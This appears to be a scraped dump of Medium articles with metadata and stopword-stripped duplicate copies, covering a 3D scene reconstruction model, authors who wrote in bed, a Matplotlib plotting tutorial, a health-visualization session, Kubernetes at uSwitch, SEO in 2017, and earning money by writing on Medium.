Title Atlas — Neural Network Reconstructing 3D Scene Image 📸Content Limitations past model Traditional approach 3D reconstruction task rely intermediate representation depth map predicting full 3D model scene researcher hypothesized direct 2D 3D prediction without intermediate step would yield accurate result proposed approach work input model 2D image scene 2D CNN extract feature input image separately feature projected accumulated voxels 3D accumulation CNN refines accumulated feature predicts truncated signed distance function TSDF value addition semantic segmentation reconstructed 3D model carried without significant additional calculationsTags Deep Learning Machine Learning Data Science Artificial Intelligence AI
3,851
There are Only Two Jobs You Can Do From Your Bed
Here are some writers and authors who did great work and even preferred writing in bed: 1. Marcel Proust Shanghai Noir Marcel Proust writing in bed “It is pleasant, when one is distraught, to lie in the warmth of one’s bed, and there, with all effort and struggle at an end, even perhaps with one’s head under the blankets, surrender completely to howling, like branches in the autumn wind.” 2. Truman Capote “I am a completely horizontal author,” said the author of In Cold Blood and Breakfast at Tiffany’s, “I can’t think unless I’m lying down, either in bed or stretched on a couch and with a cigarette and coffee handy.” Truman Capote writing in bed Copyright getty image 3. William Wordsworth The Romantic poet apparently preferred writing his poems in bed in complete darkness, starting over whenever he lost a sheet of paper because looking for it was too much effort. 4. Mark Twain “Just try it in bed some time,” the author told the New York Times in 1902. “I sit up with a pipe in my mouth and a board on my knees, and I scribble away. Thinking is easy work, and there isn’t much labor in moving your fingers sufficiently to get the words down.” 5. James Joyce The Irish author wrote lying down on his stomach — which doesn’t seem like the most comfortable position. 6. George Orwell The dying George Orwell used to prop his typewriter up in bed and hammer away at the final draft of 1984. The doctor who treated him in Glasgow said all he could remember was the sound of typing and the fog of cigarette smoke in Orwell’s bedroom.
https://medium.com/writing-heals/there-are-only-two-jobs-you-can-do-from-your-bed-9f1a5fd9bf38
['Michelle Monet']
2019-11-09 17:11:29.314000+00:00
['Writing Life', 'History', 'Writing', 'Creativity', 'Art']
Title Two Jobs BedContent writer author great work even preferred writing bed 1 Marcel Proust Shanghai Noir Marcel Proust writing bed “It pleasant one distraught lie warmth one’s bed effort struggle end even perhaps one’s head blanket surrender completely howling like branch autumn wind” 2 Truman Capote “I completely horizontal author” said author Cold Blood Breakfast Tiffany’s “I can’t think unless I’m lying either bed stretched couch cigarette coffee handy” Truman Capote writing bed Copyright getty image 3 William Wordsworth Romantic poet apparently preferred writing poem bed complete darkness starting whenever lost sheet paper looking much effort 4 Mark Twain “Just try bed time” author told New York Times 1902 “I sit pipe mouth board knee scribble away Thinking easy work isn’t much labor moving finger sufficiently get word down” 5 James Joyce Irish author wrote lying stomach — doesn’t seem like comfortable position 6 George Orwell dying George Orwell used prop typewriter bed hammer away final draft 1984 doctor treated Glasgow said could remember sound typing fog cigarette smoke Orwell’s bedroomTags Writing Life History Writing Creativity Art
3,852
People first: Aurélien Nicolas (Deckard AI)
“AI for Software Engineering Process Management” is another field where Artificial Intelligence is applied to Software Engineering. This time we prepared an interview with Aurélien Nicolas, CTO at Deckard AI and an expert in this subject matter, to share a bit about his technical background, personal motivation and professional vision.
https://medium.com/ai-for-software-engineering/people-first-aur%C3%A9lien-nicolas-deckard-ai-3a1768ff9d93
['Aiforse Community']
2017-10-27 07:07:35.514000+00:00
['Machine Learning', 'Project Management', 'Software Development', 'Artificial Intelligence', 'People']
Title People first Aurélien Nicolas Deckard AIContent “AI Software Engineering Process Management” another one filed using Artificial Intelligence Software Engineering time prepared interview Aurélien Nicolas CTO Deckard AI expert Subject Matter share bit technical background personal motivation profession visionTags Machine Learning Project Management Software Development Artificial Intelligence People
3,853
Starting off with Visualization in Python — Matplotlib
The first step, as always, is to import all the required libraries. import matplotlib.pyplot as plt import numpy as np from random import sample %matplotlib inline Let’s generate some data for the plotting exercise and plot a simple line plot. x = np.linspace(0,10,20)#Generate 20 points between 0 and 10 y = x**2 # Create y as X squared plt.plot(x,y) # Plot the above data Figure 1 Plotting the above figure requires only a single line command. While it is simple, it does not mean we don’t have the option to customize it. plt.plot(x, y, color='green', linestyle='--', linewidth=2, alpha= 0.5) Figure 2 The parameters passed to the plot command control the following: ‘color’ indicates the colour of the line and can even be given as an RGB hex code ‘linestyle’ sets the style of the line and can be ‘--’ or ‘-.’ for a dashed or dash-dotted line ‘linewidth’ takes a numeric input indicating the thickness of the line ‘alpha’ controls the transparency of the line. Sometimes a line might not be enough; you might need to indicate the exact data points, in which case you can add markers. plt.plot(x, y, marker = 'o', markerfacecolor = 'red', markersize = 5) Fig 3 This plot has red coloured round markers. These markers can further be customized by modifying their boundaries. plt.plot(x, y, marker = 'o', markerfacecolor = 'red', markersize = 10, markeredgewidth = 2, markeredgecolor = 'black') Fig 4 The markers are the same as before, but now they have a black boundary. The parameters for controlling the markers are: ‘marker’ indicates the shape of the marker and can be ‘o’, ‘*’ or ‘+’ ‘markerfacecolor’ indicates the colour of the marker ‘markersize’, similar to linewidth, controls the size of the marker ‘markeredgewidth’ and ‘markeredgecolor’ are used for specifying the boundary thickness and colour respectively. Let’s combine all of the above into one plot (a possible version of this command is sketched at the end of this article): Figure 5 Not the prettiest of plots, but you get the idea. While this covers the basics of plotting data, there is still a lot more to be done in terms of titles, ranges of axes, legends etc. The easiest way to do this is via the use of Matplotlib’s object oriented method. Object Oriented method Matplotlib has an object oriented API which allows you to create figure and axes objects. These objects can then be called in an orderly manner to perform functions such as plotting the data or customizing the figure. fig, ax = plt.subplots() Fig 6 The above command returns the figure and axis objects and creates an empty plot. This can then be used to recreate the above plot with the plot and axes titles and the legend. fig, ax = plt.subplots()#Create the objects ax.plot(x,y,label = 'X squared')#The data to be plotted and legend ax.set_title('Plot 1')#Plot title ax.set_xlabel('X')#X axis title ax.set_ylabel('Y')#Y axis title ax.set_xlim(0,10)#Range of X axis ax.set_ylim(0,110)#Range of Y axis plt.legend()#Command to display the legend Fig 7 The above plot (Fig 7) has the axes and plot titles, legend and different ranges for the X and Y axes. Plotting Multiple lines Suppose you want to compare two different sets of data, i.e., by plotting multiple lines in the same figure. In that case all you need to add is one more plot command.
fig, ax = plt.subplots()#Create the objects ax.plot(x,y,label = 'X squared')#The data to be plotted and legend ax.plot(x,x**3,label = 'X cubed')#The data to be plotted and legend ax.set_title('Plot 1')#Plot title ax.set_xlabel('X')#X axis title ax.set_ylabel('Y')#Y axis title ax.set_xlim(0,10)#Range of X axis ax.set_ylim(0,110)#Range of Y axis plt.legend()#Command to display the legend Fig 8 Another way of comparing would be to show two different plots side by side. fig, ax = plt.subplots(1,2)#Create the objects ax[0].plot(x,y,label = 'X squared')#The data to be plotted and legend ax[1].plot(x,x**3,label = 'X cubed')#The data to be plotted and legend ax[0].set_title('Plot 1')#Plot title ax[1].set_title('Plot 2')#Plot title ax[0].legend()#Command to display the legend for plot 1 ax[1].legend()#Command to display the legend for plot 2 plt.tight_layout()#To ensure no overlap Fig 9 This is done by first passing in the number of plots in the ‘subplots()’ function. The (1,2) above means that there should be 1 row of plots and 2 columns of plots, in effect meaning 2 plots. The functions are repeated for each one of the plots and the ‘tight_layout()’ command ensures that there is no overlap. A small change here is the command used to display the legends. The plt.legend() command displays the legend for only one plot; to display both, you need to specify it for each plot. The third way of comparison would be to use an inset plot. Within a larger plot, have a smaller plot. fig, ax = plt.subplots(figsize = (12,4)) axins = ax.inset_axes([0.1,0.6,0.4,0.3] )#Left, Bottom, Width, Height ax.plot(x,y,label='X squared')# Main plot axins.plot(x,1/x,label='X inverse')# Inset plot ax.set_xlabel('X')#X axis title ax.set_ylabel('Y')#Y axis title axins.set_xlabel('X')#X axis title axins.set_ylabel('Y')#Y axis title ax.set_title('Main Plot')#Main plot title axins.set_title('Inset Plot')# Inset plot title ax.legend()#Legend for main plot axins.legend()#Legend for inset plot Fig 10 The ‘figsize’ parameter within the ‘subplots()’ function allows you to change the size of the figure. The ‘inset_axes’ function is used to create the inset plot while also specifying its location and size. The first two numbers specify the inset’s location as a fraction of the main axes. In the above case, 0.1 and 0.6 specify that the inset’s lower-left corner should sit 10% in from the left edge and 60% up from the bottom of the main plot. The last two numbers, 0.4 and 0.3, specify that the inset should be 40% of the main plot’s width and 30% of its height. You might have noticed that the legend of the main plot is overlapping the inset plot. While matplotlib automatically chooses the best possible location for the legend, it can be manually moved as well using the ‘loc’ parameter. fig, ax = plt.subplots(figsize = (12,4)) axins = ax.inset_axes([0.1,0.6,0.4,0.3] )#Left, Bottom, Width, Height ax.plot(x,y,label='X squared') axins.plot(x,1/x,label='X inverse') ax.set_xlabel('X')#X axis title ax.set_ylabel('Y')#Y axis title axins.set_xlabel('X')#X axis title axins.set_ylabel('Y')#Y axis title ax.set_title('Main Plot') axins.set_title('Inset Plot') ax.legend(loc = 4) axins.legend() Fig 11 The ‘loc’ parameter takes an integer between 0 and 10 (or an equivalent string such as 'lower right') corresponding to a position within the plot. 0 is the default and means that Matplotlib will choose the best possible position; the other integers correspond to fixed locations. Here I passed ‘4’ ('lower right') to the ‘loc’ parameter, so the legend is placed in the bottom right corner.
The last customization I will cover is changing the plot background. fig, ax = plt.subplots(figsize = (12,4)) axins = ax.inset_axes([0.1,0.6,0.4,0.3] )#Left, Bottom, Width, Height ax.plot(x,y,label='X squared') axins.plot(x,1/x,label='X inverse') ax.set_xlabel('X')#X axis title ax.set_ylabel('Y')#Y axis title ax.grid(True)#Show grid axins.set_xlabel('X')#X axis title axins.set_ylabel('Y')#Y axis title axins.grid(color='blue', alpha=0.3, linestyle='--', linewidth=2)#Grid modifications ax.set_title('Main Plot') axins.set_title('Inset Plot') ax.legend(loc = 4) axins.legend() Fig 12 The main plot here has the default grid, which can be created by simply calling the grid() function. The grid lines too can be modified just like the plot lines. These modifications can be seen in the inset plot. The grid lines in it have a different colour, style and width compared to the ones in the main plot.
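One gap worth closing: the combined styling shown earlier as Figure 5 was described but its command was not included. A possible reconstruction, assuming it simply merges the line and marker parameters introduced above (the exact values are guesses), is:

import matplotlib.pyplot as plt
import numpy as np

x = np.linspace(0, 10, 20)
y = x ** 2

# Possible reconstruction of the Figure 5 command, combining the line and
# marker parameters used earlier in the article.
plt.plot(x, y,
         color='green', linestyle='--', linewidth=2, alpha=0.5,   # line styling
         marker='o', markerfacecolor='red', markersize=10,        # marker styling
         markeredgewidth=2, markeredgecolor='black')              # marker boundary
plt.show()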
https://towardsdatascience.com/visualization-in-python-matplotlib-c5c2aa2620a
['Pranav Prathvikumar']
2019-10-24 20:03:31.178000+00:00
['Python', 'Data Science', 'Visualization', 'Data Visualization']
Title Starting Visualization Python — MatplotlibContent First step always import required library import matplotlibpyplot plt import numpy np random import sample matplotlib inline Lets generate data plotting exercise plot simple line plot x nplinspace01020Generate 20 point 0 10 x2 Create X squared pltplotxy Plot data Figure 1 Plotting figure requires single line command simple mean don’t option customize pltplotx colorgreen linestyle linewidth2 alpha 05 Figure 2 parameter passed within plot command control ‘color’ indicates colour line given even RGB hex code ‘linestyle’ want line ‘ — — ’ ‘’ dash dotted line ‘linewidth’ take integer input indicating thickness line ‘alpha’ control transparency line Sometimes line might enough might need even indicate exact data point case add marker pltplotx marker markerfacecolor red markersize 5 Fig 3 plot red coloured round marker marker customized modifying boundary pltplotx marker markerfacecolor red markersize 10 markeredgewidth 2 markeredgecolor black Fig 4 marker black boundary parameter controlling marker ‘marker’ indicates shape want marker ‘o’ ‘’ ‘’ ‘markerfacecolor’ indicates colour marker ‘markersize’ similar linewidth control size marker ‘markeredgewidth’ ‘markeredgecolor’ used specifying boundary thickness colour respectively Lets combine together one plot Figure 5 prettiest plot get idea cover basic plotting data still lot done term title range ax legend etc easiest way via use Matplotlib’s object oriented method Object Oriented method Matplotlib object oriented API allows create figure ax object object called orderly manner perform function plotting data customizing figure fig ax pltsubplots Fig 6 command return figure axis object creates empty plot used recreate plot plot ax title legend fig ax pltsubplotsCreate object axplotxylabel X squaredThe data plotted legend axsettitlePlot 1Plot title axsetxlabelXX axis title axsetylabelYY axis title axsetxlim010Range X axis axsetylim0110Range axis pltlegendCommand display legend Fig 7 plotFig 7 ax plot title legend different range X ax Plotting Multiple line Suppose want compare two different set data ie plotting multiple line figure case need add one plot command fig ax pltsubplotsCreate object axplotxylabel X squaredThe data plotted legend axplotxx3label X cubedThe data plotted legend axsettitlePlot 1Plot title axsetxlabelXX axis title axsetylabelYY axis title axsetxlim010Range X axis axsetylim0110Range axis pltlegendCommand display legend Fig 8 Another way comparing would show two different plot side side fig ax pltsubplots12Create object ax0plotxylabel X squaredThe data plotted legend ax1plotxx3label X cubedThe data plotted legend ax0settitlePlot 1Plot title ax1settitlePlot 2Plot title ax0legendCommand display legend plot 1 ax1legendCommand display legend plot 2 plttightlayoutTo ensure overlap Fig 9 done first passing number plot ‘subplot’ function 12 mean 1 row plot 2 column plot effective meaning 2 plot function repeated one plot ‘tightlayout’ command ensures overlap small change command display legend plotlegend function display legend one plot display need specify plot third way comparison would use inset plot Within larger plot smaller plot fig ax pltsubplotsfigsize 124 axins axinsetaxes01060403 Left Bottom Width Height axplotxylabelX squared Main plot axinsplotx1xlabelX inverse Inset plot axsetxlabelXX axis title axsetylabelYY axis title axinssetxlabelXX axis title axinssetylabelYY axis title axsettitleMain PlotMain plot title axinssettitleInset Plot Inset plot title axlegendLegend main 
plot axinslegendLegend inset plot Fig 10 ‘figsize’ parameter within ‘subplots’ function allows change size figure ‘insetaxes’ function used create inset plot also specifying location size first two number specify plot location term percentage case first two number 01 06 specifies plot 10 left 60 X ax respectively last two number 04 03 specifies plot 40 30 main plot’s width height might noticed legend main plot overlapping inset plot matplotlib automatically chooses best possible location legend manually moved well using ‘loc’ parameter fig ax pltsubplotsfigsize 124 axins axinsetaxes01060403 Left Bottom Width Height axplotxylabelX squared axinsplotx1xlabelX inverse axsetxlabelXX axis title axsetylabelYY axis title axinssetxlabelXX axis title axinssetylabelYY axis title axsettitleMain Plot axinssettitleInset Plot axlegendloc 4 axinslegend Fig 11 ‘loc’ parameter take input 0 10 corresponding position within plot 0 mean Matplotlib choose best possible position default option integer corresponding location within plot passed ‘4’ ‘loc’ parameter meaning legend placed bottom right corner last customization covering changing plot background fig ax pltsubplotsfigsize 124 axins axinsetaxes01060403 Left Bottom Width Height axplotxylabelX squared axinsplotx1xlabelX inverse axsetxlabelXX axis title axsetylabelYY axis title axgridTrueShow grid axinssetxlabelXX axis title axinssetylabelYY axis title axinsgridcolorblue alpha03 linestyle linewidth2Grid modification axsettitleMain Plot axinssettitleInset Plot axlegendloc 4 axinslegend Fig 12 main plot default grid created simply calling grid function grid line modified like plot line modification seen inset plot grid line different colour style width compared one main plotTags Python Data Science Visualization Data Visualization
3,854
Blood and Barbed Wire
Initial meeting Despite the informality of working on the floor of my home office, I felt that I should kick off the meeting with some semi-professional expectation-setting; I let him know that my main goal was to put together visuals that would help him more effectively tell his story when seeing a new GI doctor. I also told him I was going to ask a lot of questions and he could opt out if he didn’t want to talk about something. (That seems important when crossing boundaries between friendship and informal counseling.) He’d shown up to my house with a 4-page, single spaced document in which he had written down the things he wanted to say — symptom descriptions, tests he’d had, diets and interventions he’d tried, family history, and more. The narrative contained a lot of useful information, but I could see that it could be difficult for a doctor to absorb in a short amount of time. Timeline sketch We started with a timeline of events. I had taped together four 11x17 pages and drawn a line to represent his whole life. Using his prepared narrative, we hunched over the timeline and noted key events; as we worked, he also remembered things that were not in his document. Some detail from the initial timeline Feeling good/bad Next I left the room and gave him some materials to put together a picture of what his body feels like when he’s feeling good and feeling bad. I’d prepared a sheet of icons that he could cut out and tape to the body shape, or he could simply draw on it. He took about 10 minutes to do this. When I came back, I was extremely impressed by what he had put together. I asked him to talk me through it, and as he did I wrote down quotes along the side of the image. Feeling bad: “Like barbed wire making its way through my intestines” Feeling good: At this point we had a timeline, drawings of what ‘feeling good’ and ‘feeling bad’ look like, and a list of questions and theories that had come up along the way. Key problem Aside from not getting any answers or solid reasoning for his symptoms, my friend’s biggest frustration was that new doctors kept wanting to have him try the same treatments, even though he was sure they were not helping. We decided to put together a matrix showing what ‘helps’ and ‘does not help’ along with any supporting evidence.
https://medium.com/pictal-health/blood-barbed-wire-cfef600bfdd4
['Katie Mccurdy']
2018-04-18 18:19:55.700000+00:00
['Health', 'Visualization', 'Data', 'Healthcare', 'UX']
Title Blood Barbed WireContent Initial meeting Despite informality working floor home office felt kick meeting semiprofessional expectationsetting let know main goal put together visuals would help effectively tell story seeing new GI doctor also told going ask lot question could opt didn’t want talk something seems important crossing boundary friendship informal counseling He’d shown house 4page single spaced document written thing wanted say — symptom description test he’d diet intervention he’d tried family history narrative contained lot useful information could see could difficult doctor absorb short amount time Timeline sketch started timeline event taped together four 11x17 page drawn line represent whole life Using prepared narrative hunched timeline noted key event worked also remembered thing document detail initial timeline Feeling goodbad Next left room gave material put together picture body feel like he’s feeling good feeling bad I’d prepared sheet icon could cut tape body shape could simply draw took 10 minute came back extremely impressed put together asked talk wrote quote along side image Feeling bad “Like barbed wire making way intestines” Feeling good point timeline drawing ‘feeling good’ ‘feeling bad’ look like list question theory come along way Key problem Aside getting answer solid reasoning symptom friend’s biggest frustration new doctor kept wanting try treatment even though sure helping decided put together matrix showing ‘helps’ ‘does help’ along supporting evidenceTags Health Visualization Data Healthcare UX
3,855
Convergence to Kubernetes
We wanted to scale our teams further but maintain the principles of what helped us move fast: autonomy, work with minimal coordination, self-service infrastructure. Kubernetes helps us achieve this in a few ways: Application-focused abstractions We operate and configure our clusters to minimise coordination Application focused abstractions At the core of Kubernetes are concepts that map closely to the language used by an application developer. For example, you manage versions of your applications as a Deployment. You can run multiple replicas behind a Service and map that to HTTP via Ingress. And, through Custom Resources, it’s possible to extend and specialise this language to your own needs. These abstractions help application teams be more productive. The ones I’ve described above are pretty much all you need to deploy and run a web application, for example. Kubernetes automates the rest. In my iceberg picture I showed earlier these core concepts sit at the waterline: connecting what an application developer is trying to achieve with the platform underneath. Our cluster operations team can make many of the lower-level, lower-value decisions (like managing metrics, logging etc.) but have a conceptual language that connects them to the application teams above. In 2010 uSwitch operated a traditional operations team that was responsible for running the monolith and in relatively recent history had an IT team that was partly responsible for managing our AWS account. I believe one of the things that constrained the success of that team was the lack of conceptual sharing. When your language only includes concepts like EC2 instances, load-balancers, subnets, it’s hard to communicate much meaning. It made it difficult/impossible to describe what an application was; sometimes that was a Debian package, maybe it was something deployed with Capistrano etc. It wasn’t possible to describe an application in language shared by teams. In the early 2000s I worked at ThoughtWorks in London. During my interviews I was recommended Eric Evans’ Domain Driven Design book. I bought a copy from Foyles on my way home, started reading it on the train and have referenced it on most projects and systems I’ve worked on ever since. One of the key concepts presented in the book is Ubiquitous Language: emphasising the careful extraction of common vocabulary to aid communication amongst people and teams. I believe that one of Kubernetes’ greatest strengths is providing a ubiquitous language that connects applications teams and infrastructure teams. And, because it’s extensible, this can grow beyond the core concepts to more domain and business specific concepts. Shared language helps us communicate more effectively when we need to but we still want to ensure teams can operate with minimal coordination. 
Minimise Necessary Coordination In the Accelerate book the authors highlight characteristics of loosely-coupled architecture that drives IT performance: the biggest contributor to continuous delivery in the 2017 analysis… is whether teams can: Make large-scale changes to the design of their system without the permission of somebody outside the team Make large-scale changes to the design of their system without depending on other teams to make changes in their systems or creating significant work for other teams Complete their work without communicating and coordinating with people outside their team Deploy and release their product or service on demand, regardless of other services it depends upon Do most of their testing on demand, without requiring an integrated test environment We wanted to run centralised, soft multi-tenant clusters that all teams could build upon but we wanted to retain many of the characteristics described above. It’s not possible to avoid entirely but we operate Kubernetes as follows to try and minimise it: We run multiple production clusters and teams are able to choose which clusters to run their application in. We don’t use Federation yet (we’re waiting on AWS support) but we use Envoy instead to load-balance across the different cluster Ingress load-balancers. We can automate much of this with our Continuous Delivery pipeline (we use Drone) and other AWS services. All clusters are configured with the same Namespaces. These map approximately 1:1 with teams. We use RBAC to control access to Namespaces. All access is authenticated and authorised against our corporate identity in Active Directory. Clusters are auto-scaled and we do as much as we can to optimise node start-up time. It’s still a couple of minutes but it means that, in general, no coordination is needed even when teams need to run large workloads. Applications auto-scale using application-level metrics exported from Prometheus. Application teams can export Queries per Second, Operations per Second etc. and manage the autoscaling of their application in response to that metric. And, because we use the Cluster autoscaler, nodes will be provisioned if demand exceeds our current cluster capacity. We wrote a Go command-line tool called u that standardises the way teams authenticate to Kubernetes, Vault, request temporary AWS credentials and more. Authenticating to Kubernetes using u command-line tool I’m not arguing that Kubernetes has increased our autonomy, although that may be the case, but it’s certainly helped us maintain high levels of self-service and autonomy while reducing some of the pain we felt.
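As a small illustration of the namespace-per-team model above, the check below uses the official Kubernetes Python client to ask the API server which team Namespaces the current (AD-authenticated) user may deploy into. It is only a sketch: the namespace names are invented, and the real uSwitch workflow is the u CLI described above, not this script.

from kubernetes import client, config

# Sketch: ask the API server which team namespaces the current user can deploy into.
# The namespace names below are made up for the example.
config.load_kube_config()                      # picks up the team's kubeconfig
authz = client.AuthorizationV1Api()

for namespace in ["energy", "payments", "platform"]:
    review = client.V1SelfSubjectAccessReview(
        spec=client.V1SelfSubjectAccessReviewSpec(
            resource_attributes=client.V1ResourceAttributes(
                namespace=namespace,
                verb="create",
                resource="deployments",
                group="apps",
            )
        )
    )
    result = authz.create_self_subject_access_review(review)
    print(namespace, "allowed" if result.status.allowed else "denied")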
https://pingles.medium.com/convergence-to-kubernetes-137ffa7ea2bc
['Paul Ingles']
2018-06-25 13:29:15.825000+00:00
['Lean', 'Agile', 'Kubernetes', 'DevOps', 'AWS']
Title Convergence KubernetesContent wanted scale team maintain principle helped u move fast autonomy work minimal coordination selfservice infrastructure Kubernetes help u achieve way Applicationfocused abstraction operate configure cluster minimise coordination Application focused abstraction core Kubernetes concept map closely language used application developer example manage version application Deployment run multiple replica behind Service map HTTP via Ingress Custom Resources it’s possible extend specialise language need abstraction help application team productive one I’ve described pretty much need deploy run web application example Kubernetes automates rest iceberg picture showed earlier core concept sit waterline connecting application developer trying achieve platform underneath cluster operation team make many lowerlevel lowervalue decision like managing metric logging etc conceptual language connects application team 2010 uSwitch operated traditional operation team responsible running monolith relatively recent history team partly responsible managing AWS account believe one thing constrained success team lack conceptual sharing language includes concept like EC2 instance loadbalancers subnets it’s hard communicate much meaning made difficultimpossible describe application sometimes Debian package maybe something deployed Capistrano etc wasn’t possible describe application language shared team early 2000s worked ThoughtWorks London interview recommended Eric Evans’ Domain Driven Design book bought copy Foyles way home started reading train referenced project system I’ve worked ever since One key concept presented book Ubiquitous Language emphasising careful extraction common vocabulary aid communication amongst people team believe one Kubernetes’ greatest strength providing ubiquitous language connects application team infrastructure team it’s extensible grow beyond core concept domain business specific concept Shared language help u communicate effectively need still want ensure team operate minimal coordination Minimise Necessary Coordination Accelerate book author highlight characteristic looselycoupled architecture drive performance biggest contributor continuous delivery 2017 analysis… whether team Make largescale change design system without permission somebody outside team Make largescale change design system without depending team make change system creating significant work team Complete work without communicating coordinating people outside team Deploy release product service demand regardless service depends upon testing demand without requiring integrated test environment wanted run centralised soft multitenant cluster team could build upon wanted retain many characteristic described It’s possible avoid entirely operate Kubernetes follows try minimise run multiple production cluster team able choose cluster run application don’t use Federation yet we’re waiting AWS support use Envoy instead loadbalance across different cluster Ingress loadbalancers automate much Continuous Delivery pipeline use Drone AWS service cluster configured Namespaces map approximately 11 team use RBAC control access Namespaces access authenticated authorised corporate identity Active Directory Clusters autoscaled much optimise node startup time It’s still couple minute mean general coordination needed even team need run large workload Applications autoscale using applicationlevel metric exported Prometheus Application team export Queries per Second Operations per Second etc manage 
autoscaling application response metric use Cluster autoscaler node provisioned demand exceeds current cluster capacity wrote Go commandline tool called u standardises way team authenticate Kubernetes Vault request temporary AWS credential Authenticating Kubernetes using u commandline tool I’m arguing Kubernetes increased autonomy although may case it’s certainly helped u maintain high level selfservice autonomy reducing pain feltTags Lean Agile Kubernetes DevOps AWS
3,856
How SEO Works In 2017
How SEO Works In 2017
The way SEO works has changed. Here’s what you need to know.
Most purchasing decisions start with a Google search and, as such, SEO should still be your #1 source of new traffic, new leads and new revenue. If it’s not, then this is what to do about it. If it is, then this is how to keep it that way.
How SEO used to work
When Google started it was one single internet search engine… You would log on to google.com and perform a search. And regardless of who or where you were, you would have seen the same list of businesses from all around the world.
At the time, this was fine. Google was just getting started, the internet wasn’t very big and there weren’t that many people using it. But it was growing. And it got bigger. Much bigger. In 1998, there were 2.4 million websites on the internet. Today, there are over 1.2 billion. And it’s growing by the second.
As the volume of websites on the internet grows, so does the volume of people doing Google searches. With this much data to process, and this many users to serve, it no longer made sense for Google to show everyone around the world the same list of results. And that’s how we got localised search engines, the idea being to show all users search results that were geographically relevant to their individual location.
As the growth continued, so did the localisation, to the point most people are familiar with today: ‘city based’ search engines. Whether searching a keyword with a local intent like “mechanic” or “mechanic brisbane”, most people would expect to see businesses that are in their local city. This is the paradigm most businesses we speak to are familiar with, and it has been the primary model for decision-making around SEO strategy for a long time. And for a long time, it worked well. But not anymore. Why?
https://medium.com/digitaldisambiguation/how-seo-works-in-2017-279fe1c64709
['Jason Mcmahon']
2017-12-21 01:12:48.771000+00:00
['SEO', 'Google', 'Advertising', 'Marketing', 'Digital Marketing']
Title SEO Works 2017Content SEO Works 2017 way SEO work changed Here’s need know way SEO work changed Here’s need know purchasing decision start Google search SEO still 1 source new traffic new lead new revenue it’s keep way SEO used work Google started one single internet search engine… would log googlecom perform search regardless would seen list business around world time fine Google getting started internet wasn’t big wasn’t many people using growing got bigger Much bigger 1998 24 million website internet Today 12 billion it’s growing second volume website internet grows volume people Google search much data process many user serve longer made sense Google show everyone around world list result that’s got localised search engine like idea show user search result geographically relevant individual location growth continued localisation point people familiar today ‘city based’ search engine Whether searching keyword local intent like “mechanic” “mechanic brisbane” people would expect see business local city paradigm business speak familiar primary model decision making around SEO strategy long time long time worked well anymore WhyTags SEO Google Advertising Marketing Digital Marketing
3,857
Is Medium Worth It for Freelance Writers?
Is Medium Worth It for Freelance Writers? It depends on your goals and how much you’re willing to invest in the platform Image by Jason McBride Medium is one of the most exciting platforms for writers. It’s easy to publish your work. There are no gatekeepers or technical hurdles stopping you. It is also much easier to find an audience on Medium than it is on a traditional blog. Even better, if you want, you can get paid for your work directly from the platform. You don’t have to sell a course or affiliate products — you can get paid based on the amount of time people spend reading your words. However, if you are a professional writer, you have to guard your time carefully. Is it worth it to write on Medium? The answer depends on what you want to get out of the platform. I have been a freelance writer making a full-time income online for over eight years. I joined the Medium Partner Program in 2018. The most I have ever made in a month from the Partner Program is $1,070 in August of this year. Last month I made $533, and this month I will probably make another $500. I am not a high earner here. I have also taken long breaks from the platform because of health issues and my freelance business demands. However, I keep coming back to Medium for three reasons: It’s fun to write here Every article I write becomes a tiny digital asset Writing on Medium is great for my business Why Do You Want to Write Here? If you want to write on Medium because it’s an easy way to make money, you are wasting your time. Only 6% of writers make over $100 any given month. The highest-earning writers, the ones that earn six-figures a year just from the Partner Program, have spent years writing tons of articles. They have worked their asses off to build a loyal audience, and they have written a ton. I know writers who make significant money on Medium. You could be one of them if you want to, but it takes a lot of work. Other than looking for a shortcut to fame and fortune, there are no wrong reasons for writing on Medium. It can be an excellent way to earn some extra money. It can also be an excellent way to improve your writing skills and to meet other writers and editors. Before you decide if writing on Medium is worth it for you, you need to have a plan for how you will use the platform. Ways to Use Medium to Help Your Career Except for my first month, I have always earned at least $100 on Medium. Even when I went six months without publishing anything on the platform because I was dealing with kidney cancer, my articles were still earning a little bit of money every day. You can earn some passive income from Medium if you have a large enough backlist of curated articles. The more I publish, the more I make from the Partner Program. As much as I love getting paid directly from Medium, the reason I keep coming back here is that there are other ways to make money from writing here. I have made much more money from clients that have hired me after reading one of my posts on Medium than I ever have from the Partner Program. It’s not even close. If you are a freelance writer, Medium lets you get paid to build a portfolio. Clients can see that you have the knowledge and skills to help them. Through your writing, they get to know you before they even contact you. Another way Medium helps freelancers is that it allows you to build an email list. Building an email list will help you grow your writing business because you can take your audience with you, no matter where you go. Medium could disappear tomorrow. 
If you have an email list, you can direct your biggest fans to your next project. Some writers on Medium have leveraged their work here to get book deals and sell articles to magazine publishers. When you consistently put good work out into the world, people eventually take notice. Medium helps you get noticed faster. No matter what kind of writer you want to be, Medium can help you take the next step in your career if you are strategic. Changes in the Platform This doesn’t mean Medium is perfect. There is always a danger to publishing on a platform you don’t control. Medium is always changing. Sometimes the changes require you to shift the way you use the platform. Currently, Medium is changing the look of the platform and tweaking how stories are found. If you are interested in succeeding here, it doesn’t do any good to complain. You always have the same choices. You can quit, you can refuse to adapt and fade into obscurity, or you can evolve with the platform. I’ve been lucky here. Every change Medium has made since I joined in 2018 has made it easier for me to make money. However, the current changes require me to adapt. I still believe that Medium is good for me financially and creatively. But, I have changed how I use the platform. Future Strategy In the past, I have used my two main publications, Escape Motivation and Weirdo Poetry, to build two very different audiences. This has always been difficult, and with the new changes, it may be impossible for me. My new strategy is to create a new account to publish poetry, humor, comics, and visual essays in Weirdo Poetry while using this account to post stories about writing, freelancing, marketing, and business. I will still publish 99% of my work in Escape Motivation. I suspect it will take a long time for my new account to ever make $100. The kind of short creative work I write there is not easy to monetize on Medium. My main goal for the other account is to build an audience and experiment with different forms. My new account is about creative expression. I want to make it profitable, but creativity is the primary goal. The focus of this account will continue to be making money by helping freelancers, solopreneurs, and small businesses. That strategy has worked well for the past two years, and I don’t see any reason to change. I am going to be publishing more regularly on both accounts. If you are interested in my new account, you can find it here: You Get Out What You Put In Is Medium worth it for freelancers? Yes! If you are willing to invest time in building a library of useful content for your audience, it is worth the effort to write here. However, you will have to decide what your strategy will be. You have a lot of different options. But, while I believe you can do anything — you can’t do everything. You will only succeed if you commit to a strategy.
https://medium.com/escape-motivation/is-medium-worth-it-for-freelance-writers-4f9de8cc7ccb
['Jason Mcbride']
2020-10-15 07:53:07.286000+00:00
['Work', 'Freelancing', 'Business', 'Creativity', 'Writing']
